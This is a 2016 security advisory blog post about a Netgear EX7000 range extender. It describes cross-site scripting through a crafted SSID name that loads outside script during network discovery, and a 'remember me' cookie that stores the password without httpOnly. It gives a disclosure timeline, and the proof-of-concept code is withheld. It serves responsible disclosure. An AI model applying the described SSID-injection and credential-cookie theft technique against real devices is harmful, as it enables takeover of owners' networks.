Blog: Vulnerability Advisory

Netgear EX7000 Wi-Fi Range Extender. Minor XSS and Poor Password Handling

Jamie Riden 15 Nov 2016

fixedNetgear was informed of this issue on 4th June 2016. Fixed firmware is now available, but I’m not sure when it was released as they didn’t tell me.

Hardware Version: EX7000

Firmware Version affected: V1.0.0.42_1.0.94 ( and probably before that as well )

Firmware updates are here – or use the web page check function :  http://www.netgear.com/support/product/EX7000.aspx?cid=wmt_netgear_organic#download

It was possible to conduct a Cross Site Scripting attack against the EX7000 AC1900 router with current firmware. If you create an SSID called ex700-1 and perform a network discovery, the code located at http://xjs.io will execute when you move the mouse over the network name.

ex700-2

While doing this, it became apparent that the “remember me” option stores the username and password as cookies, without setting them as “httpOnly”.

Now, I do appreciate that the attacker needs to be physically near to the device during setup, so that the SSID shows up in the list, so it’s not a major issue by any means – but it does serve to illustrate that any data you accept from the outside world needs to be validated, and not just the direct input parameters of the web application.

As a proof of concept, I wrote some javascript code which mimics the normal configuration of the extended wireless network, and creates a 2.4Ghz channel called “FREEWIFI” with no encryption or authentication.  Another bit of javascript was tested which removes the password from the web interface.  (We won’t be releasing these until the firmware is actually updated.)

Users should upgrade their firmware, or at least be careful when performing wireless surveys using their EX7000 and should not use the Remember Me function.

Netgear also need to find a better way of dealing with remembering the user over repeated sessions. Storing the password in a cookie is a really bad idea, and not using “httpOnly” – which would prevent it from being accessed by client side JavaScript – just makes it worse.

Timeline

4th June 2016 – notified vendor

<Some to’ing and fro’ing>

26th July 2016 – vendor says this issue will hopefully be addressed in due course.

“We do have a Field Trial release available and the vulnerability issue has been addressed. The next maintenance release will include this resolution.”

11th November – Having heard nothing further, I checked to see if any updates were available. XSS in SSID issue appears to be fixed.